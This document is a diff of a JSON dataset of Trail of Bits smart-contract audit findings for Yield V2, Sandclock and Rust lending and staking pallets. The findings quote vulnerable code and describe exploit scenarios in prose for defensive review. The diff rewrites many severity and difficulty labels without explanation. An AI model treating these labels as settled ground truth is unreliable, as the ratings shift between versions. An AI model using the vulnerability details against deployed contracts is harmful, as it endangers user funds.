ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has nished and that the pricing data is from the current round. Long term, dene a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) .", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Medium" ] }, @@ -845,8 +795,8 @@ "body": "MakerDAOs Dutch auction system imposes limits on the amount of collateral that can be auctioned o at once (both the total amount and the amount of each collateral type). If the MakerDAO system experienced a temporary oracle failure, these limits would prevent a catastrophic loss of all collateral. The Yield Protocol auction system is similar to MakerDAOs but lacks such limits, meaning that all of its collateral could be auctioned o for below-market prices. Exploit Scenario The oracle price feeds (or other components of the system) experience an attack or another issue. The incident causes a majority of the vaults to become undercollateralized, triggering auctions of those vaults collateral. The protocol then loses the majority of its collateral, which is auctioned o for below-market prices, and enters an undercollateralized state from which it cannot recover. Recommendations Short term, introduce global and type-specic limits on the amount of collateral that can be auctioned o at the same time. Ensure that these limits protect the protocol from total liquidation caused by bugs while providing enough liquidation throughput to accommodate all possible price changes. Long term, wherever possible, introduce limits for the systems variables to ensure that they remain within the expected ranges. These limits will minimize the impact of bugs or attacks against the system. 33 Yield V2", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -855,7 +805,7 @@ "body": "Users call the Witch contracts auction function to start auctions for undercollateralized vaults. To reduce the losses incurred by the protocol, this function should be called as soon as possible after a vault has become undercollateralized. However, the Yield Protocol system does not provide users with a direct incentive to call Witch.auction. By contrast, the MakerDAO system provides rewards to users who initialize auctions. Exploit Scenario A stock market crash triggers a crypto market crash. The numerous corrective arbitrage transactions on the Ethereum network cause it to become congested, and gas prices skyrocket. To keep the Yield Protocol overcollateralized, many undercollateralized vaults must be auctioned o. However, because of the high price of calls to Witch.auction, and the lack of incentives for users to call it, too few auctions are timely started. As a result, the system incurs greater losses than it would have if more auctions had been started on time. Recommendations Short term, reward those who call Witch.auction to incentivize users to call the function (and to do so as soon as possible). Long term, ensure that users are properly incentivized to perform all important operations in the protocol. 34 Yield V2", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: Low" ] }, @@ -865,7 +815,7 @@ "body": "Math64x64 has been copied and pasted into the yieldspace-v2 repository. The code documentation does not specify the exact revision that was made or whether the code was modied. As such, the contracts will not reliably reect updates or security xes implemented in this dependency, as those changes must be manually integrated into the contracts. Exploit Scenario Math64x64 receives an update with a critical x for a vulnerability. An attacker detects the use of a vulnerable contract and can then exploit the vulnerability against any of the Yield Protocol contracts that use Math64x64. Recommendations Short term, review the codebase and document the source and version of the dependency. Include third-party sources as submodules in your Git repositories to maintain internal path consistency and ensure that any dependencies are updated periodically. Long term, use an Ethereum development environment and NPM to manage packages in the project. 35 Yield V2", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, @@ -876,7 +826,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -886,7 +836,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -896,7 +846,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: N/A" + "Difficulty: Undetermined" ] }, { @@ -905,8 +855,8 @@ "body": "Strategy contract functions use the contracts balance to determine how many liquidity or base tokens to provide to a user minting or burning tokens. The Strategy contract inherits from the ERC20Rewards contract, which denes a reward token and a reward distribution schedule. An admin must send reward tokens to the Strategy contract to fund its reward payouts. This ow relies on an underlying assumption that the reward token will be dierent from the base token. /// @dev Set a rewards token. /// @notice Careful, this can only be done once. function setRewardsToken(IERC20 rewardsToken_) external auth { } require(rewardsToken == IERC20(address(0)), \"Rewards token already set\"); rewardsToken = rewardsToken_; emit RewardsTokenSet(rewardsToken_); Figure 10.1: yield-utils-v2/contracts/token/ERC20Rewards.sol#L58-L67 The burnForBase() function tracks the Strategy contracts base token balance. If the base token is used as the reward token, the contracts base token balance will be inated to include the reward token balance (and the balance tracked by the function will be incorrect). As a result, when attempting to burn strategy tokens, a user may receive more base tokens than he or she deserves for the number of strategy tokens being burned: /// @dev Burn strategy tokens to withdraw base tokens. It can be called only when a pool is not selected. 29 Yield V2 /// @notice The strategy tokens that the user burns need to have been transferred previously, using a batchable router. function burnForBase(address to) external poolNotSelected returns (uint256 withdrawal) { } // strategy * burnt/supply = withdrawal uint256 burnt = _balanceOf[address(this)]; withdrawal = base.balanceOf(address(this)) * burnt / _totalSupply; _burn(address(this), burnt); base.safeTransfer(to, withdrawal); Figure 10.2: strategy-v2/contracts/Strategy.sol#L258-L271 Exploit Scenario Bob deploys the Strategy contract; DAI is set as a base token of that contract and is also dened as the reward token in the ERC20Rewards contract. After a pool has ocially been closed, Eve uses burnWithBase() to swap base tokens for strategy tokens. Because the calculation takes into account the base tokens balance, she receives more base tokens than she should. Recommendations Short term, add checks to verify that the reward token is not set to the base token, liquidity token, fyToken, or strategy token. These checks will ensure that users cannot leverage contract balances that include reward token balances to turn a prot. Long term, analyze all token interactions in the contract to ensure they do not introduce unexpected behavior into the system. 30 Yield V2", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: High", + "Difficulty: Medium" ] }, { @@ -915,8 +865,8 @@ "body": "Sensitive information such as Etherscan keys, API keys, and an owner private key used in testing is stored in the process environment. This method of storage could make it easier for an attacker to compromise the keys; compromise of the owner key, for example, could enable an attacker to gain owner privileges and steal funds from the protocol. The following portion of the hardhat.config.js le uses secrets from the process environment: let mnemonic = process.env.MNEMONIC if (!mnemonic) { try { mnemonic = fs.readFileSync(path.resolve(__dirname, '.secret')).toString().trim() } catch(e){} } const accounts = mnemonic ? { mnemonic, }: undefined let etherscanKey = process.env.ETHERSCANKEY if (!etherscanKey) { try { etherscanKey = fs.readFileSync(path.resolve(__dirname, '.etherscanKey')).toString().trim() } catch(e){} } Figure 11.1: vault-v2/hardhat.config.ts#L67-L82 31 Yield V2 Exploit Scenario Alice, a member of the Yield team, has secrets stored in the process environment. Eve, an attacker, gains access to Alices device and extracts the Infura and owner keys from it. Eve then launches a denial-of-service attack against the front end of the system and uses the owner key to steal the funds held by the owner on the mainnet. Recommendations Short term, to prevent attackers from accessing system funds, avoid using hard-coded secrets or storing secrets in the process environment. Long term, use a hardware security module to ensure that keys can never be extracted. 32 Yield V2", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -926,7 +876,67 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" + ] + }, + { + "title": "1. receiveFlashLoan does not account for fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The receiveFlashLoan functions of the scWETHv2 and scUSDCv2 vaults ignore the Balancer ash loan fees and repay exactly the amount that was loaned. This is not currently an issue because the Balancer vault does not charge any fees for ash loans. However, if Balancer implements fees for ash loans in the future, the Sandclock vaults would be prevented from withdrawing investments back into the vault. function flashLoan ( IFlashLoanRecipient recipient, IERC20[] memory tokens, uint256 [] memory amounts, bytes memory userData ) external override nonReentrant whenNotPaused { uint256 [] memory feeAmounts = new uint256 [](tokens.length); uint256 [] memory preLoanBalances = new uint256 [](tokens.length); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 amount = amounts[i]; preLoanBalances[i] = token.balanceOf( address ( this )); feeAmounts[i] = _calculateFlashLoanFeeAmount(amount); token.safeTransfer( address (recipient), amount); } recipient.receiveFlashLoan(tokens, amounts, feeAmounts , userData); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 preLoanBalance = preLoanBalances[i]; uint256 postLoanBalance = token.balanceOf( address ( this )); uint256 receivedFeeAmount = postLoanBalance - preLoanBalance; _require(receivedFeeAmount >= feeAmounts[i]); _payFeeAmount(token, receivedFeeAmount); } } Figure 1.1: Abbreviated code showing the receivedFeeAmount check in the Balancer flashLoan method in 0xBA12222222228d8Ba445958a75a0704d566BF2C8#code#F5#L78 In the Balancer flashLoan function , shown in gure 1.1, the contract calls the recipients receiveFlashLoan function with four arguments: the addresses of the tokens loaned, the amounts for each token, the fees to be paid for the loan for each token, and the calldata provided by the caller. The Sandclock vaults ignore the fee amount and repay only the principal, which would lead to reverts if the fees are ever changed to nonzero values. Although this problem is present in multiple vaults, the receiveFlashLoan implementation of the scWETHv2 contract is shown in gure 1.2 as an illustrative example: function receiveFlashLoan ( address [] memory , uint256 [] memory amounts, uint256 [] memory , bytes memory userData) external { _isFlashLoanInitiated(); // the amount flashloaned uint256 flashLoanAmount = amounts[ 0 ]; // decode user data bytes [] memory callData = abi.decode(userData, ( bytes [])); _multiCall(callData); // payback flashloan asset.safeTransfer( address (balancerVault), flashLoanAmount ); _enforceFloat(); } Figure 1.2: The feeAmounts parameter is ignored by the receiveFlashLoan method. ( sandclock-contracts/src/steth/scWETHv2.sol#L232L249 ) Exploit Scenario After Sandclocks scUSDv2 and scWETHv2 vaults are deployed and users start depositing assets, the Balancer governance system decides to start charging fees for ash loans. Users of the Sandclock protocol now discover that, apart from the oat margin, most of their funds are locked because it is impossible to use the ash loan functions to withdraw vault assets from the underlying investment pools. Recommendations Short term, use the feeAmounts parameter in the calculation for repayment to account for future Balancer ash loan fees. This will prevent unexpected reverts in the ash loan handler function. Long term, document and justify all ignored arguments provided by external callers. This will facilitate a review of the systems third-party interactions and help prevent similar issues from being introduced in the future.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Reward token distribution rate can diverge from reward token balance ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The privileged distributor role is responsible for transferring reward tokens to the RewardTracker contract and then passing the number of tokens sent as the _reward parameter to the notifyRewardAmount method. However, the _reward parameter provided to this method can be larger than the number of reward tokens transferred. Given the accounting for leftover rewards, such a situation would be dicult to recover from. /// @notice Lets a reward distributor start a new reward period. The reward tokens must have already /// been transferred to this contract before calling this function. If it is called /// when a reward period is still active, a new reward period will begin from the time /// of calling this function, using the leftover rewards from the old reward period plus /// the newly sent rewards as the reward. /// @dev If the reward amount will cause an overflow when computing rewardPerToken, then /// this function will revert. /// @param _reward The amount of reward tokens to use in the new reward period. function notifyRewardAmount ( uint256 _reward ) external onlyDistributor { _notifyRewardAmount(_reward); } Figure 2.1: The comment on the notifyRewardAmount method hints at an unenforced assumption that the number of reward tokens transferred must be equal to the _reward parameter provided. ( sandclock-contracts/src/staking/RewardTracker.sol#L185L195 ) If a _reward value smaller than the actual number of transferred tokens is provided, the situation can be xed by calling notifyRewardAmount again with a _reward parameter that accounts for the dierence between the RewardTracker contracts actual token balance and the rewards already scheduled for distribution. This solution is possible because the _notifyRewardAmount helper function accounts for leftover rewards if it is called during an ongoing reward period. function _notifyRewardAmount ( uint256 _reward ) internal { ... uint64 rewardRate_ = rewardRate; uint64 periodFinish_ = periodFinish; uint64 duration_ = duration; ... if ( block.timestamp >= periodFinish_) { newRewardRate = _reward / duration_; } else { uint256 remaining = periodFinish_ - block.timestamp ; uint256 leftover = remaining * rewardRate_; newRewardRate = (_reward + leftover ) / duration_; } Figure 2.2: The accounting for leftover rewards in the _notifyRewardAmount helper method ( sandclock-contracts/src/staking/RewardTracker.sol#L226L262 ) This accounting for leftover rewards, however, makes the situation dicult to recover from if a _reward parameter that is too large is provided to the notifyRewardAmount method. As shown by the arithmetic in gure 2.2, if the reward period has not nished, the code for creating the newRewardRate value can only add to the reward distribution, not subtract from it. The only way to bring a too-large reward distribution back in line with the RewardTracker contracts reward token balance is to transfer additional reward tokens to the contract. Exploit Scenario The RewardTracker distributor transfers 10 reward tokens to the RewardTracker contract and then mistakenly calls the notifyRewardAmount method with a _reward parameter of 100. Some users call the claimRewards method early and receive inated rewards until the contracts balance is depleted, leaving later users unable to claim any rewards. To recover, the distributor either needs to provide another 90 reward tokens to the RewardTracker contract or accept the reputational loss of allowing this miscongured reward period to nish before resetting the reward payouts correctly during the next period. Recommendations Short term, modify the _notifyRewardAmount helper function to reset the rewardRate so that it is in line with the current rewardToken balance and the time remaining in the reward period. This change could also allow the fetchRewards method to maintain its current behavior but with only a single rewardToken.balanceOf external call. Long term, review the internal accounting state variables and document the ways in which they are inuenced by the actual ow of funds. Pay attention to any internal accounting values that can be inuenced by external sources, including privileged accounts, and reexamine the systems assumptions surrounding the ow of funds.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "3. Miscalculation in beforeWithdraw can leave the vault with less than minimum oat ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "When a user wants to redeem or withdraw, the beforeWithdraw function is called with the number of assets to be withdrawn as the assets parameter. This function makes sure that if the value of the float parameter (that is, the available assets in the vault) is not enough to pay for the withdrawal, the strategy gets some assets back from the pools to be able to pay. function beforeWithdraw ( uint256 assets , uint256 ) internal override { uint256 float = asset.balanceOf( address ( this )); if (assets <= float) return ; uint256 minimumFloat = minimumFloatAmount; uint256 floatRequired = float < minimumFloat ? minimumFloat - float : 0 ; uint256 missing = assets + floatRequired - float; _withdrawToVault(missing); } Figure 3.1: The aected code in sandclock-contracts/src/steth/scWETHv2.sol#L386L396 When the float value is enough, the function returns and the withdrawal is paid with the existing oat. If the float value is not enough, the missing amount is recovered from the pools via the adapters. The issue lies in the calculation of the missing parameter: it does not guarantee that the float value remaining after the withdrawal is at least the value of the minimumFloatAmount parameter. The consequence is that the calculation always leaves a oat equal to floatRequired in the vault. If this value is small enough, it can cause users to waste gas when withdrawing small amounts because they will need to pay for the gas-intensive _withdrawToVault action. This eclipses the usefulness of having the oat in the vault. The correct calculation should be uint256 missing = assets + minimumFloat - float; . Using this correct calculation would make the calculation of the floatRequired parameter unnecessary as it would no longer be required or used in the rest of the code. Exploit Scenario The value for minimumFloatAmount is set to 1 ether in the scWETHv2 contract. For this scenario, suppose that the current oat is exactly equal to minimumFloatAmount . Alice wants to withdraw 0.15 WETH from her invested amount. Because this amount is less than the current oat, her withdrawal is paid from the vault assets, leaving the oat equal to 0.85 WETH after the operation. Then, Bill wants to withdraw 0.9 WETH, but the vault has no available assets to pay for it. In this case, when beforeWithdraw is called, Bill has to pay gas for the call to _withdrawToVault , which is an expensive action because it includes gas-intensive operations such as loops and a ash loan. After Bills withdrawal, the oat in the vault is 0.15 WETH. This is a relatively small amount compared with minimumFloatValue , and it will likely make the next withdrawing/redeeming user also have to pay for the call to _withdrawToVault . Recommendations Short term, replace the calculation of the missing amount to be withdrawn on line 393 of the scWETHv2 contract with assets + minimumFloat - float . This calculation will ensure that the minimum oat restriction is enforced after withdrawals. It will take the required oat into consideration, so the separate calculation of floatRequired on line 392 of scWETHv2 would no longer be required. Long term, add unit or fuzz tests to make sure that the vault has an amount of assets equal to or greater than the minimum expected amount at all times.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4. Last user in scWETHv2 vault will not be able to withdraw their funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "When a user wants to withdraw, the withdrawal amount is checked against the current vault oat (the uninvested assets readily available in the vault). If the withdrawal amount is less than the oat, the amount is paid from the available balance; otherwise, the protocol has to disinvest from the strategies to get the required assets to pay for the withdrawal. The issue with this approach is that in order to maintain a oat equal to the minimumFloatValue parameter in the vault, the value to be disinvested from the strategies is calculated in the beforeWithdraw function, and its correct value is equal to the sum of the amount to be withdrawn and the minimum oat minus the current oat. If there is only one user remaining in the vault and they want to withdraw, this enforcement will not allow them to do so, because there will not be enough invested in the strategies to leave a minimum oat in the vault after the withdrawal. They would only be able to withdraw their assets minus the minimum oat at most. The code for the _withdrawToVault function is shown in gure 4.1. The line highlighted in the gure would cause the revert in this situation, as there would not be enough invested to supply the requested amount. function _withdrawToVault ( uint256 _amount ) internal { uint256 n = protocolAdapters.length(); uint256 flashLoanAmount ; uint256 totalInvested_ = _totalCollateralInWeth() - totalDebt(); bytes [] memory callData = new bytes [](n + 1 ); uint256 flashLoanAmount_ ; uint256 amount_ ; uint256 adapterId ; address adapter ; for ( uint256 i ; i < n; i++) { (adapterId, adapter) = protocolAdapters.at(i); (flashLoanAmount_, amount_) = _calcFlashLoanAmountWithdrawing(adapter, _amount, totalInvested_); flashLoanAmount += flashLoanAmount_; callData[i] = abi.encodeWithSelector( this .repayAndWithdraw.selector, adapterId, flashLoanAmount_, priceConverter.ethToWstEth(flashLoanAmount_ + amount_) ); } // needed otherwise counted as loss during harvest totalInvested -= _amount; callData[n] = abi.encodeWithSelector(scWETHv2.swapWstEthToWeth.selector, type( uint256 ).max, slippageTolerance); uint256 float = asset.balanceOf( address ( this )); _flashLoan(flashLoanAmount, callData); emit WithdrawnToVault(asset.balanceOf( address ( this )) - float); } Figure 4.1: The aected code in sandclock-contracts/src/steth/scWETHv2.sol#L342L376 Additionally, when this revert occurs, an integer overow is given as the reason, which obscures the real reason and can make the users experience more confusing. Exploit Scenario Bob is the only remaining user in a scWETHv2 vault, and he has 2 ether invested. He wants to withdraw his assets, but all of his calls to the withdrawal function keep reverting due to an integer overow. He keeps trying, wasting gas in the process, until he discovers that the maximum amount he is allowed to withdraw is around 1 ether. The rest of his funds are locked in the vault until the keeper makes a manual call to withdrawToVault or until the admin lowers the minimum oat value. Recommendations Short term, x the calculation of the amount to be withdrawn and make sure that it never exceeds the total invested amount. Long term, add end-to-end unit or fuzz tests that are representative of the way multiple users can interact with the protocol. Test for edge cases involving various numbers of users, investment amounts, and critical interactions, and make sure that the protocols invariants hold and that users do not lose access to funds in the event of such edge cases.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "5. Lido stake rate limit could lead to unexpected reverts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "To mitigate the eects of a surge in demand for stETH on the deposit queue, Lido has implemented a rate limit for stake submissions. This rate limit is ignored by the lidoSwapWethToWstEth method of the Swapper library, potentially leading to unexpected reversions. The Lido stETH integration guide states the following: To avoid [reverts due to the rate limit being hit], you should check if getCurrentStakeLimit() >= amountToStake , and if it's not you can go with an alternative route. function lidoSwapWethToWstEth ( uint256 _wethAmount ) external { // weth to eth weth.withdraw(_wethAmount); // stake to lido / eth => stETH stEth.submit{value: _wethAmount}( address ( 0x00 )); // stETH to wstEth uint256 stEthBalance = stEth.balanceOf( address ( this )); ERC20( address (stEth)).safeApprove( address (wstETH), stEthBalance); wstETH.wrap(stEthBalance); } Figure 5.1: The submit method is subject to a rate limit that is not taken into account. ( sandclock-contracts/src/steth/Swapper.sol#L130L142 ) Exploit Scenario A surge in demand for Ethereum validators leads many people using Lido to stake ETH, causing the Lido rate limit to be hit, and the submit method of the stEth contract begins to revert. As a result, the Sandclock keeper is unable to deposit despite the presence of alternate routes to obtain stETH, such as through Curve or Balancer. Recommendations Short term, have the lidoSwapWethToWstEth method of the Swapper library check whether the amount being deposited is less than the value returned by the getCurrentStakeLimit method of the stEth contract. If it is not, have the code use ZeroEx to swap or revert with a message that clearly communicates the reason for the failure. Long term, review the documentation for all third-party interactions and note any situations in which the integration could revert unexpectedly. If such reversions are acceptable, clearly document how they could occur and include a justication for this acceptance in the inline comments.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Chainlink oracles could return stale price data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-sandclock-securityreview.pdf", + "body": "The latestRoundData() function from Chainlink oracles returns ve values: roundId , answer , startedAt , updatedAt , and answeredInRound . The PriceConverter contract reads only the answer value and discards the rest. This can cause outdated prices to be used for token conversions, such as the ETH-to-USDC conversion shown in gure 6.1. function ethToUsdc ( uint256 _ethAmount ) public view returns ( uint256 ) { ( , int256 usdcPriceInEth ,,, ) = usdcToEthPriceFeed.latestRoundData(); return _ethAmount.divWadDown( uint256 (usdcPriceInEth) * C.WETH_USDC_DECIMALS_DIFF); } Figure 6.1: All returned data other than the answer value is ignored during the call to a Chainlink feeds latestRoundData method. ( sandclock-contracts/src/steth/PriceConverter.sol#L67L71 ) According to the Chainlink documentation , if the latestRoundData() function is used, the updatedAt value should be checked to ensure that the returned value is recent enough for the application. Similarly, the LUSD/ETH price feed used by the scLiquity vault is an intermediate contract that calls the deprecated latestAnswer method on upstream Chainlink oracles. contract LSUDUsdToLUSDEth is IPriceFeed { IPriceFeed public constant LUSD_USD = IPriceFeed( 0x3D7aE7E594f2f2091Ad8798313450130d0Aba3a0 ); IPriceFeed public constant ETH_USD = IPriceFeed( 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419 ); function latestAnswer () external view override returns ( int256 ) { return (LUSD_USD.latestAnswer() * 1 ether) / ETH_USD.latestAnswer(); } } Figure 6.2: The custom latestAnswer method in 0x60c0b047133f696334a2b7f68af0b49d2F3D4F72#code#L19 The Chainlink API reference ags the latestAnswer method as (Deprecated - Do not use this function.). Note that the upstream IPriceFeed contracts called by the intermediate LSUDUsdToLUSDEth contract are upgradeable proxies. It is possible that the implementations will be updated to remove support for the deprecated latestAnswer method, breaking the scLiquity vaults lusd2eth price feed. Because the oracle price feeds are used for calculating the slippage tolerance, a dierence may exist between the oracle price and the DEX pool spot price, either due to price update delays or normal price uctuations or because the feed has become stale. This could lead to two possible adverse scenarios: If the oracle price is signicantly higher than the pool price, the slippage tolerance could be too loose, introducing the possibility of an MEV sandwich attack that can prot on the excess. If the oracle price is signicantly lower than the pool price, the slippage tolerance could be too tight, and the transaction will always revert. Users will perceive this as a denial of service because they would not be able to interact with the protocol until the price dierence is settled. Exploit Scenario Bob has assets invested in a scWETHv2 vault and wants to withdraw part of his assets. He interacts with the contracts, and every withdrawal transaction he submits reverts due to a large dierence between the oracle and pool prices, leading to failed slippage checks. This results in a waste of gas and leaves Bob confused, as there is no clear indication of where the problem lies. Recommendations Short term, make sure that the oracles report up-to-date data, and replace the external LUSD/ETH oracle with one that supports verication of the latest update timestamp. In the case of stale oracle data, pause price-dependent Sandclock functionality until the oracle comes back online or the admin replaces it with a live oracle. Long term, review the documentation for Chainlink and other oracle integrations to ensure that all of the security requirements are met to avoid potential issues, and add tests that take these possible situations into account. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" ] }, { @@ -946,7 +956,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -955,7 +965,7 @@ "body": "The Pallet::force_update_market method can be used to replace the stored market instance for a given asset. Other methods used to update market parameters perform extensive validation of the market parameters, but force_update_market checks only the rate model. pub fn force_update_market ( origin: OriginFor , asset_id: AssetIdOf , market: Market >, ) -> DispatchResultWithPostInfo { T::UpdateOrigin::ensure_origin(origin)?; ensure!( market.rate_model.check_model(), Error::::InvalidRateModelParam ); let updated_market = Self ::mutate_market(asset_id, |stored_market| { *stored_market = market; stored_market.clone() })?; Self ::deposit_event(Event::::UpdatedMarket(updated_market)); Ok (().into()) } Figure 3.1: pallets/loans/src/lib.rs:539-556 This means that the caller (who is either the root account or half of the general council) could inadvertently change immutable market parameters like ptoken_id by mistake. Exploit Scenario The root account calls force_update_market to update a set of market parameters. By mistake, the ptoken_id market parameter is updated, which means that Pallet::ptoken_id and Pallet::underlying_id are no longer inverses. Recommendations Short term, consider adding more input validation to the force_update_market extrinsic. In particular, it may make sense to ensure that the ptoken_id market parameter has not changed. Alternatively, add validation to check whether the ptoken_id market parameter is updated and to update the UnderlyingAssetId map to ensure that the value matches the Markets storage map.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -965,7 +975,7 @@ "body": "The staking ledger is used to keep track of the total amount of staked funds in the system. It is updated in response to cross-consensus messaging (XCM) requests to the parent chain (either Polkadot or Kusama). A number of the StakingLedger methods lack sucient input validation before they update the staking ledgers internal state. Even though the input is validated as part of the original XCM call, there could still be issues due to implementation errors or overlooked corner cases. First, the StakingLedger::rebond method does not use checked arithmetic to update the active balance. The method should also check that the computed unlocking_balance is equal to the input value at the end of the loop to ensure that the system remains consistent. pub fn rebond (& mut self , value: Balance ) { let mut unlocking_balance: Balance = Zero::zero(); while let Some (last) = self .unlocking.last_mut() { if unlocking_balance + last.value <= value { unlocking_balance += last.value; self .active += last.value; self .unlocking.pop(); } else { let diff = value - unlocking_balance; unlocking_balance += diff; self .active += diff; last.value -= diff; } if unlocking_balance >= value { break ; } } } Figure 4.1: pallets/liquid-staking/src/types.rs:199-219 Second, the StakingLedger::bond_extra method does not use checked arithmetic to update the total and active balances . pub fn bond_extra (& mut self , value: Balance ) { self .total += value; self .active += value; } Figure 4.2: pallets/liquid-staking/src/types.rs:223-226 Finally, the StakingLedger::unbond method does not use checked arithmetic when updating the active balance. pub fn unbond (& mut self , value: Balance , target_era: EraIndex ) { if let Some ( mut chunk) = self .unlocking .last_mut() .filter(|chunk| chunk.era == target_era) { // To keep the chunk count down, we only keep one chunk per era. Since // `unlocking` is a FIFO queue, if a chunk exists for `era` we know that // it will be the last one. chunk.value = chunk.value.saturating_add(value); } else { self .unlocking.push(UnlockChunk { value, era: target_era , }); }; // Skipped the minimum balance check because the platform will // bond `MinNominatorBond` to make sure: // 1. No chill call is needed // 2. No minimum balance check self .active -= value; } Figure 4.3: pallets/liquid-staking/src/types.rs:230-253 Since the staking ledger is updated by a number of the XCM response handlers, and XCM responses may return out of order, it is important to ensure that input to the staking ledger methods is validated to prevent issues due to race conditions and corner cases. We could not nd a way to exploit this issue, but we cannot rule out the risk that it could be used to cause a denial-of-service condition in the system. Exploit Scenario The staking ledger's state is updated as part of a WithdrawUnbonded request, leaving the unlocking vector in the staking ledger empty. Later, when the response to a previous call to rebond is handled, the ledger is updated again, which leaves it in an inconsistent state. Recommendations Short term, ensure that the balance represented by the staking ledgers unlocking vector is enough to cover the input balance passed to StakingLedger::rebond . Use checked arithmetic in all staking ledger methods that update the ledgers internal state to ensure that issues due to data races are detected and handled correctly.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -975,8 +985,8 @@ "body": "When the liquid-staking pallet generates an XCM request for the parent chain, the corresponding XCM response triggers a call to Pallet::notification_received . If the response is of the Response::ExecutionResult type, this method calls Pallet::do_notification_received to handle the result. The Pallet::do_notification_received method checks whether the request was successful and then updates the local state according to the corresponding XCM request, which is obtained from the XcmRequests storage map. fn do_notification_received ( query_id: QueryId , request: XcmRequest , res: Option <( u32 , XcmError)>, ) -> DispatchResult { use ArithmeticKind::*; use XcmRequest::*; let executed = res.is_none(); if !executed { return Ok (()); } match request { Bond { index: derivative_index , amount, } => { ensure!( !StakingLedgers::::contains_key(&derivative_index), Error::::AlreadyBonded ); let staking_ledger = >>::new( Self ::derivative_sovereign_account_id(derivative_index), amount, ); StakingLedgers::::insert(derivative_index, staking_ledger); MatchingPool::::try_mutate(|p| -> DispatchResult { p.update_total_stake_amount(amount, Subtraction) })?; T::Assets::burn_from( Self ::staking_currency()?, & Self ::account_id(), Amount )?; } // ... } XcmRequests::::remove(&query_id); Ok (()) } Figure 5.1: pallets/liquid-staking/src/lib.rs:1071-1159 If the method completes without errors, the XCM request is removed from storage via a call to XcmRequests::remove(query_id) . However, if any of the following conditions are true, the corresponding XCM request is left in storage indenitely: 1. The request fails and Pallet::do_notification_received exits early. 2. Pallet::do_notification_received fails. 3. The response type is not Response::ExecutionResult . These three cases are currently unhandled by the codebase. The same issue is present in the crowdloans pallet implementation of Pallet::do_notification_received . Recommendations Short term, ensure that failed XCM requests are handled correctly by the crowdloans and liquid-staking pallets.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -985,8 +995,8 @@ "body": "The loans pallet uses oracle prices to nd a USD value of assets using the get_price function (gure 6.1). The get_price function internally uses the T::PriceFeeder::get_price function, which returns a timestamp and the price. However, the returned timestamp is ignored. pub fn get_price (asset_id: AssetIdOf ) -> Result { let (price, _) = T::PriceFeeder::get_price(&asset_id) .ok_or(Error::::PriceOracleNotReady)?; if price.is_zero() { return Err (Error::::PriceIsZero.into()); } log::trace!( target: \"loans::get_price\" , \"price: {:?}\" , price.into_inner() ); Ok (price) } Figure 6.1: pallets/loans/src/lib.rs: 1430-1441 Exploit Scenario The price feeding oracles fail to deliver prices for an extended period of time. The get_price function returns stale prices, causing the get_asset_value function to return a non-market asset value. Recommendations Short term, modify the code so that it compares the returned timestamp from the T::PriceFeeder::get_price function with the current timestamp, returns an error if the price is too old, and handles the emergency price, which currently has a timestamp of zero. This will stop the market if stale prices are returned and allow the governance process to intervene with an emergency price.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -995,8 +1005,8 @@ "body": "The claim extrinsic in the crowdloans pallet is missing code to subtract the claimed amount from vault.contributed to update the total contribution amount (gure 7.1). A similar bug exists in the refund extrinsic: there is no subtraction from vault.contributed after the Self::contribution_kill call. pub fn claim ( origin: OriginFor , crowdloan: ParaId , lease_start: LeasePeriod , lease_end: LeasePeriod , ) -> DispatchResult { // ... Self ::contribution_kill( vault.trie_index, &who, 